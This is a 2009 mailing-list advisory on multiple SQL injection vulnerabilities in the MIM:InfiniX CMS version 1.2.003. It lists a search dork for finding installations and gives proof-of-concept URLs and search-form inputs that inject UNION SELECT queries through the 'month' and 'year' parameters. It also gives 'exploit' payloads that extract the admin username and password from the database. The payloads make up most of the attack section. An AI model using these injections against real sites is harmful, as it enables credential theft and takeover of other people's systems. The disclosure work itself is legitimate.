[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

MULTIPLE REMOTE SQL INJECTION VULNERABILITIES---MIM:InfiniX v1.2.003--->



--------------------------------------------------------------------------
MULTIPLE REMOTE SQL INJECTION VULNERABILITIES --MIM:InfiniX v1.2.003-->
--------------------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://mim.infinix.it
-->DOWNLOAD: https://sourceforge.net/projects/infinix/
-->DEMO: http://mim.infinix.it
-->CATEGORY: CMS / Portal
-->DESCRIPTION: MIM:InfiniX Manuale Intermediale della Modernita': Infinite 
Info...
                in Xml PHP-XHTML-XML-XSL-CSS-AJAX-RDF. Design your CMS and 
store...
-->RELEASED: 2009-04-21

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "Developed by rbk"
-->CATEGORY: MULTIPLE SQL INJECTION VULNERABILITIES
-->AFFECT VERSION: 1.2.003 (maybe <= ?)
-->Discovered Bug date: 2009-04-27
-->Reported Bug date: 2009-04-27
-->Fixed bug date: 2009-04-28
-->Info patch: v1.2.003
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su 
apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)  



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off 
+++++++++++++++++--------->>>>


-------
INTRO:
-------


Admin choose to use database or not.

This CMS is completely vulnerable to SQL Injection (I only show some vars).



------------------
PROOF OF CONCEPT:
------------------


For example ("month" and "year" GET vars). Links:


http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*&year=2009


Another example (search post form). Search this:


anything%')) union all select 
1,database(),version(),user(),5,6,7,8,9,database(),11#


----------
EXPLOITS:
----------


We get the admin credentials:


http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6
 FROM admin WHERE id=1/*

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6+FROM+admin+WHERE+id=1/*&year=2009


anything%')) union all select 
1,database(),database(),concat(user,'--::--',pass),5,6,7,8,9,database(),11 FROM 
admin WHERE id=1#






#######################################################################
#######################################################################
##*******************************************************************##
##               ESPECIAL GREETZ TO: Str0ke, JosS, ...               ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################